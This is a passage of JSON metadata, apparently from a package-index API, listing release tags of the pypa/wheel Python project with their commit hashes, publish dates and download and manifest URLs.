ub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","h